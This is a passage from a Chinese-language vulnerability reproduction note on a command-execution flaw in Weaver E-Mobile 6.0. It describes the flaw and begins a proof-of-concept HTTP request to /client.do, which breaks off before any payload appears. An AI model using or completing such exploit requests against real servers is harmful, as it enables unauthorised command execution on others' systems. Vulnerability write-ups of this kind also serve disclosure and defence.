前言
本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!
漏洞描述
Weaver E-Mobile是中国泛微科技(Weaver)公司的一个协同办公系统。
E-Mobile6最新版是上海泛微网络科技推出的一款手机办公应用,将企业微信重新改造,加入更多丰富实用的功能,让沟通更加便捷。
泛微E-Mobile 6.0被爆存在漏洞命令执行。现已确认该漏洞可被攻击者利用,攻击者可通 过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令去执行,从而获取服 务器的执行权限。
漏洞影响版本
泛微E-Mobile 6.0
漏洞复现
1.漏洞环境访问
2.漏洞POC
POST /client.do HTTP/1.1
Host: [ip:port]
User-Agent: Mozilla/5.0 (X11